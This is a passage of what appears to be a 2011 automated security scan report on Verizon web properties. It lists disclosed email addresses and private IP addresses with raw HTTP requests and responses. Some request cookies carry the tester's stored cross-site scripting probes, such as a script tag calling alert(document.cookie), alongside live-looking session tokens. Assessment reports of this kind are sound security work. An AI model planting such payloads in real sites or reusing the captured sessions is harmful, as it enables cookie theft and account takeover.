var resC = regC.test(self.location.href);
if (resC == false)
...[SNIP]...
<a class="box" target="_blank" href="mailto:vec-support@verizonbusiness.com">
...[SNIP]...

19.20. http://www.verizonbusiness.com/Medium/sign-in/vec/network.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verizonbusiness.com
Path:	/Medium/sign-in/vec/network.xml

Issue detail

The following email address was disclosed in the response:

vec-support@verizonbusiness.com

Request

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 05 Sep 2011 22:22:18 GMT
Vary: *
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
ETag: "6b7625234ff33f97a48e6869288d96f4"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 23376
Date: Mon, 05 Sep 2011 22:22:18 GMT
Connection: close
Expires: Sun, 05 Sep 2010 16:22:18 GMT

<!DOCTYPE html>
<html lang="en">

<head>
<script type="text/javascript" language="JavaScript">
var regC = /https?:\/\/.*?\/\w\w+?(\/).*/i;
var resC = regC.test(self.location.href);
if (resC == false)
...[SNIP]...
<a href="mailto:vec-support@verizonbusiness.com" class="box" target="_blank">
...[SNIP]...

19.21. http://www.verizonbusiness.com/Medium/sign-in/vec/voip.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verizonbusiness.com
Path:	/Medium/sign-in/vec/voip.xml

Issue detail

The following email address was disclosed in the response:

vec-support@verizonbusiness.com

Request

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 05 Sep 2011 22:22:42 GMT
Vary: *
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
ETag: "343cd25e06471fded4613ae60450d2ab"
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Content-Length: 24141
Date: Mon, 05 Sep 2011 22:22:43 GMT
Connection: close
Expires: Sun, 05 Sep 2010 16:22:42 GMT

<!DOCTYPE html>
<html lang="en">

<head>
<script type="text/javascript" language="JavaScript">
var regC = /https?:\/\/.*?\/\w\w+?(\/).*/i;
var resC = regC.test(self.location.href);
if (resC == false)
...[SNIP]...
<a href="mailto:vec-support@verizonbusiness.com" class="box" target="_blank">
...[SNIP]...

19.22. http://www.verizonbusiness.com/Medium/sign-in/vec/wan.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verizonbusiness.com
Path:	/Medium/sign-in/vec/wan.xml

Issue detail

The following email address was disclosed in the response:

vec-support@verizonbusiness.com

Request

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 05 Sep 2011 22:22:52 GMT
Vary: *
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
ETag: "1ae63ef34043aa573ff4ad6621f7d0f9"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 23155
Date: Mon, 05 Sep 2011 22:22:53 GMT
Connection: close
Expires: Sun, 05 Sep 2010 16:22:52 GMT

<!DOCTYPE html>
<html lang="en">

<head>
<script type="text/javascript" language="JavaScript">
var regC = /https?:\/\/.*?\/\w\w+?(\/).*/i;
var resC = regC.test(self.location.href);
if (resC == false)
...[SNIP]...
<a href="mailto:vec-support@verizonbusiness.com" class="box" target="_blank">
...[SNIP]...

19.23. http://www.verizonbusiness.com/about/news/pr-25490-en-Verizon+and+IBM+Launch+Private+Cloud+Based+Managed+Data+Protection+Solution.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verizonbusiness.com
Path:	/about/news/pr-25490-en-Verizon+and+IBM+Launch+Private+Cloud+Based+Managed+Data+Protection+Solution.xml

Issue detail

The following email addresses were disclosed in the response:

clare.ward@verizonbusiness.com
janet.brumfield@verizon.com
junaidah.dahlan@sg.verizonbusiness.com
knechtj@us.ibm.com

Request

Response

HTTP/1.1 200 OK
Vary: *
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
ETag: "5eff3d3484488f3a491f0ebee89e9e2b"
Last-Modified: Mon, 05 Sep 2011 22:18:11 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Content-Length: 33927
Date: Mon, 05 Sep 2011 22:18:11 GMT
Connection: close
Expires: Sun, 05 Sep 2010 16:18:11 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(13:09:02)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<a href="mailto:janet.brumfield@verizon.com">janet.brumfield@verizon.com</a>
...[SNIP]...
<a href="mailto:knechtj@us.ibm.com">knechtj@us.ibm.com</a>
...[SNIP]...
<a href="mailto:junaidah.dahlan@sg.verizonbusiness.com">junaidah.dahlan@sg.verizonbusiness.com</a>
...[SNIP]...
<a href="mailto:clare.ward@verizonbusiness.com">clare.ward@verizonbusiness.com</a>
...[SNIP]...

19.24. http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/Includes/Javascript/FuncInc.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Foryourhome/MyAccount/Unprotected/Includes/Javascript/FuncInc.js

Issue detail

The following email addresses were disclosed in the response:

central@my.verizon.com
ssowebapp@signin.verizon.com

Request

GET /Foryourhome/MyAccount/Unprotected/Includes/Javascript/FuncInc.js HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzinhomeagent=GUID=OQAwADQAMgAzAGQAMAA1AC0ANwA3ADAAMgAtADQANwAzAGUALQBhAGQAMAA3AC0ANQA3AGMAYwBkADUAYgAyAGMAMQA0ADYA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMQA3ADgAMQA2ADMAOQA5ADwALwBUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4A&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIAUwBUAEIARgByAG8AegBlAG4A&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIAUwBUAEIARgByAG8AegBlAG4APAAvAFQAZQB4AHQAPgA8AC8AVQBzAGUAcgBUAGUAeAB0AD4A&AccountIDAuthMode=bgBvAA==; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc65945525d5f4f58455e445a4a423660; WT_FPC=id=27bb86d4bd1c3b1dd581315275882795:lv=1315275882795:ss=1315275882795; vzapps=ZIPCODE=10010; BPSPANISH=N; NSC_xxx22_gztncja_80_mcw=ffffffff895bc6ba45525d5f4f58455e445a4a423660; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; ContextInfo_TV=FiOSTV; IHAClientIP=112.64.2.103; AimsChatURL_Cookie=https://collaborateext.verizon.com; PageTitle=Livechat; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=110ed<script>alert(document.cookie)</script>af81f92fd39; CMS_TimeZoneOffset=300; CP=null*; refURL=http://www22.verizon.com/residentialhelp/phone; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520FiOS%2520TV@http%253A//www22.verizon.com/residentialhelp/fiostv%23Verizon%2520%257C%2520-%2520How%2520do%2520I%2520use%2520Ask%2520Verizon%253F@http%253A//www22.verizon.com/ResidentialHelp/Generic/Ask%252520Verizon/Getting%252520Started/124519.htm%23; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc65c45525d5f4f58455e445a4a423660

Response

HTTP/1.0 200 OK
Content-Type: application/x-javascript
Content-Location: http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/Includes/Javascript/FuncInc.js
Last-Modified: Fri, 29 Jul 2011 09:51:56 GMT
Accept-Ranges: bytes
ETag: "06ba26d54dcc1:b178"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Date: Mon, 05 Sep 2011 22:41:49 GMT
Content-Length: 94215
Connection: close

///VZ 2.0 Customize Function
var IsNETProfile = "F";
function changeSDetails(activeTab) {

if (activeTab == 1) {

if (document.getElementById('WIcon').className == 'SerPlus') {

...[SNIP]...
}
}
}
}
}
}
urlconvert_sub();
}

function urlconvert_sub() {
var strVerrizonNet = "www.verizon.net/central@my.verizon.com/central;www.verizon.net/ssowebapp@signin.verizon.com/sso;";
var urlspltChange = strVerrizonNet.split(';');
var aTags = document.getElementsByTagName && document.getElementsByTagName('A');
for (var i = 0; i < aTags.length; i++) {

...[SNIP]...

19.25. http://www22.verizon.com/content/commontemplates/includes/Javascript/ddpng.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/content/commontemplates/includes/Javascript/ddpng.js

Issue detail

The following email address was disclosed in the response:

drew.diller@gmail.com

Request

GET /content/commontemplates/includes/Javascript/ddpng.js HTTP/1.1
Host: www22.verizon.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/residentialhelp/fiostv
Cookie: ak-sf=false; __switchTo5x=51; __unam=49dc76-1323a4a13fb-1bbb4ff9-1; ASP.NET_SessionId=ncxmtseom3hg3h4542cc0c55; GlobalSessionID=NEScwnwaL4QccG18LnT8IJ7HQ%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:13:38 PM; AkaUTrackingID=804E8C682B3FA4D861FA571CC854E9FD; AkaSTrackingID=22240856919E5F4D120128A4C01974E7; V347=3JqCYcsE1rlAhTfmCIUyRZ-iggeiohK6a-FKkJ_aMvvIaMkdz3Ks80g; CP=null*; refURL=http://www22.verizon.com/residentialhelp/fiostv; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ca45525d5f4f58455e445a4a423660; Product=A; ProductXML=A; canigetfios=Y; showpromo=N; BusinessUnit=wireless; XPID=BO-00000000521444319_%20%7C%20HSIPOE_2; ECSPCookies=Partner=VZO&SolutionCenter=FiOSTV&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=110ed<script>prompt("StoredXSS")</script>af81f92fd39; ContextInfo_TV=FiOSTV; IHAClientIP=112.64.2.103; CMS_TimeZoneOffset=300; RecentlyVisited=Verizon%2520%257C%2520FiOS%2520TV@http%253A//www22.verizon.com/residentialhelp/fiostv%23

Response

HTTP/1.0 200 OK
Content-Length: 12370
Content-Type: application/x-javascript
Last-Modified: Tue, 24 May 2011 18:20:24 GMT
Accept-Ranges: bytes
ETag: "0e4a53f3f1acc1:6f42"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 05 Sep 2011 22:29:13 GMT
Connection: close

/**
* DD_belatedPNG: Adds IE6 support: PNG images for CSS background-image and HTML <IMG/>.
* Author: Drew Diller
* Email: drew.diller@gmail.com
* URL: http://www.dillerdesign.com/experiment/DD_belatedPNG/
* Version: 0.0.8a
* Licensed under the MIT License: http://dillerdesign.com/experiment/DD_belatedPNG/#license
*
* Example usage:
* DD
...[SNIP]...

19.26. http://www22.verizon.com/onecms/vzcareers/ak-cached/4h/includes/javascript/globalalert.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/onecms/vzcareers/ak-cached/4h/includes/javascript/globalalert.js

Issue detail

The following email addresses were disclosed in the response:

lolly.chessie@vso.verizon.com
radoslaw.wilk@vso.verizon.com

Request

Response

19.27. https://www22.verizon.com/ForYourHome/VZRepair/vziha/js/jslib.axd previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/ForYourHome/VZRepair/vziha/js/jslib.axd

Issue detail

The following email address was disclosed in the response:

abc@verizon.net

Request

GET /ForYourHome/VZRepair/vziha/js/jslib.axd?d=isupport.js,Common.js,jquery-1.2.6.pack.js,jquery.ifixpng2.js,TeaLeaf.js,nifty.js,pagetracker.js,ihawebdata.js,jquery.min.js,jquery.dragable.js&v=2.2.0 HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: https://www22.verizon.com/ForYourHome/VZRepair/vziha/Service.aspx?ihaweb=WebSTBFrozen
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; CMS_TimeZoneOffset=300; PDSS=PflowId=680d1ca400d842e69be1848a9f3d28c5; DSS=flowId=f9688e84baaa4126acd87151b526b588; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; ContextInfo_TV=FiOSTV; ECSPCookies=Partner=VZO&SolutionCenter=FiOSTV&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=; IHAClientIP=112.64.2.103; CP=null*; refURL=http://www22.verizon.com/residentialhelp/fiostv; RecentlyVisited=Verizon%2520%257C%2520FiOS%2520TV@http%253A//www22.verizon.com/residentialhelp/fiostv%23Verizon%2520%257C%2520-%2520How%2520do%2520I%2520use%2520Ask%2520Verizon%253F@http%253A//www22.verizon.com/ResidentialHelp/Generic/Ask%252520Verizon/Getting%252520Started/124519.htm%23; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=VwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxAA==&IP=NQAwAC4AMgAzAC4AMQAyADMALgAxADAANgAsACAAOAAwAC4ANgA3AC4ANwA0AC4AMgAxADEALAAgADEAMQAyAC4ANgA0AC4AMQAuADEAMAA3AA==; vzinhomeagent=GUID=OQAwADQAMgAzAGQAMAA1AC0ANwA3ADAAMgAtADQANwAzAGUALQBhAGQAMAA3AC0ANQA3AGMAYwBkADUAYgAyAGMAMQA0ADYA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMQA3ADgAMQA2ADMAOQA5ADwALwBUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4A&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIAUwBUAEIARgByAG8AegBlAG4A&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIAUwBUAEIARgByAG8AegBlAG4APAAvAFQAZQB4AHQAPgA8AC8AVQBzAGUAcgBUAGUAeAB0AD4A&AccountIDAuthMode=bgBvAA==; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc65945525d5f4f58455e445a4a423660

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Last-Modified: Fri, 19 Aug 2011 00:33:06 GMT
Vary: Accept-Encoding
Content-Type: text/javascript; charset=utf-8
Content-Length: 535378
Expires: Mon, 05 Sep 2011 22:24:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:24:39 GMT
Connection: keep-alive

/*isupport.js*/

function processToServer(form)
{try{if(document.getElementById('dateList')!=null){var dateValue=document.getElementById('dateList').value;var timeValue=document.getElementById('timeL
...[SNIP]...
L="Please enter your name";}
else if(Email=="")
{alert_msg.innerHTML="Please enter your EmailID";}
else if(!Re_Email.test(Email))
{alert_msg.innerHTML="Please enter your valid EmailID. Example format: abc@verizon.net";}
else if((document.isupport.dateList)!=null)
{alert_msg.style.display='none';sendMsgToServer(document.isupport);}
else
{alert_msg.style.display='none';sendMsgToServer(document.isupport);}}
else
{ale
...[SNIP]...
lse if(document.getElementById('Notif_PrefE')!=null&&document.getElementById('Notif_PrefE').checked==true&&!Re_Email.test(Email))
{alert_msg.innerHTML="Please enter your valid EmailID. Example format: abc@verizon.net";}
else if(document.getElementById('dynTxtArea')!=null&&document.getElementById('dynTxtArea').value.length>
...[SNIP]...
lse if(document.getElementById('Notif_PrefE')!=null&&document.getElementById('Notif_PrefE').checked==true&&!Re_Email.test(Email))
{alert_msg.innerHTML="Please enter your valid EmailID. Example format: abc@verizon.net";}
else if(document.getElementById('dynTxtArea')!=null&&document.getElementById('dynTxtArea').value.length>
...[SNIP]...

20. Private IP addresses disclosed previous next
There are 15 instances of this issue:

https://b2b.verizonwireless.com/b2b/commerce/privacy.go
http://content.atomz.com/autocomplete/sp10/04/3b/7b/
http://newscenter.verizon.com/404.html
http://newscenter.verizon.com/404.html
http://newscenter.verizon.com/fact-sheets/verizon-high-speed-internet.html
http://newscenter.verizon.com/fact-sheets/verizon-high-speed-internet.html
https://survey.qualtrics.com/SE/
http://www.facebook.com/connect/prompt_feed.php
http://www.facebook.com/dialog/feed
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/profile.php
http://www.facebook.com/sharer.php
http://www.google.com/sdch/StnTz5pY.dct
http://www.whitefence.com/static/Seymour.js

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.

20.1. https://b2b.verizonwireless.com/b2b/commerce/privacy.go previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://b2b.verizonwireless.com
Path:	/b2b/commerce/privacy.go

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.170.176.64

Request

GET /b2b/commerce/privacy.go HTTP/1.1
Host: b2b.verizonwireless.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

20.2. http://content.atomz.com/autocomplete/sp10/04/3b/7b/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://content.atomz.com
Path:	/autocomplete/sp10/04/3b/7b/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.32.18

Request

GET /autocomplete/sp10/04/3b/7b/ HTTP/1.1
Host: content.atomz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:34:46 GMT
Content-Type: application/json
Via: 1.1 content.atomz.com:84
X-Cache: MISS from content.atomz.com
Connection: close
Content-Length: 614862

( [ "",
"30 day trial",
"32 bit",
"32 bit flash player",
"360 degree view",
"3d and technical imaging in adobe photoshop cs4",
"3d basics in adobe photoshop cs4",
"3d flash",
"3d glasses effect in ado
...[SNIP]...
ets at run time in adobe..flex..4.5",
"loadsound method behaves differently in flash light 3.1 than in flash light 2.x and 3.0",
"local folder",
"localconnection fails after 5 attempts in flash player 10.0.32.18 (mac os x)",
"localconnection objects prematurely close / getapplicationversion() calls return null unexpectedly",
"locate licensing serial numbers | cs5.5 production premium and master collection",
"
...[SNIP]...

20.3. http://newscenter.verizon.com/404.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://newscenter.verizon.com
Path:	/404.html

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.12.0.32

Request

Response

20.4. http://newscenter.verizon.com/404.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://newscenter.verizon.com
Path:	/404.html

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.12.0.30

Request

Response

20.5. http://newscenter.verizon.com/fact-sheets/verizon-high-speed-internet.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://newscenter.verizon.com
Path:	/fact-sheets/verizon-high-speed-internet.html

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.12.0.30

Request

Response

20.6. http://newscenter.verizon.com/fact-sheets/verizon-high-speed-internet.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://newscenter.verizon.com
Path:	/fact-sheets/verizon-high-speed-internet.html

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.12.0.32

Request

GET /fact-sheets/verizon-high-speed-internet.html HTTP/1.1
Host: newscenter.verizon.com
Proxy-Connection: keep-alive
Referer: http://newscenter.verizon.com/fact-sheets/verizon-high-speed-internet.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; lob=dotcom; myservices=vzdock=N; VISITORID=1597650297; JSESSIONID=abcEBYCpNovpd9FINW7it; CONVIO.referrer=http%3A//www.google.com/search%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dverizon+online+news+webmail%23q%3Dsite%3Averizon.com+online+news+webmail%26hl%3Den%26prmd%3Divns%26ei%3DU1BlTuKkG8bkiAKp37G7Cg%26start%3D20%26sa%3DN%26bav%3Don.2%2Cor.r_gc.r_pw.%26fp%3Db7e6040383bebbf%26biw%3D1266%26bih%3D910

Response

HTTP/1.1 200 OK
Server: Resin/3.1.8
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Mon, 05 Sep 2011 22:43:16 GMT
Set-Cookie: NSC_dnt_900_qvc=ffffffff09041e3145525d5f4f58455e445a4a4214f4;expires=Mon, 05-Sep-2011 23:43:16 GMT;path=/;httponly
Content-Length: 125028

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<meta name="generator" content="Convio CMS" />
<script language="JavaScrip
...[SNIP]...

...[SNIP]...

20.7. https://survey.qualtrics.com/SE/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://survey.qualtrics.com
Path:	/SE/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

192.168.1.29

Request

GET /SE/ HTTP/1.1
Host: survey.qualtrics.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

20.8. http://www.facebook.com/connect/prompt_feed.php previous next

Summary

Severity:	Information
Confidence:	Certain
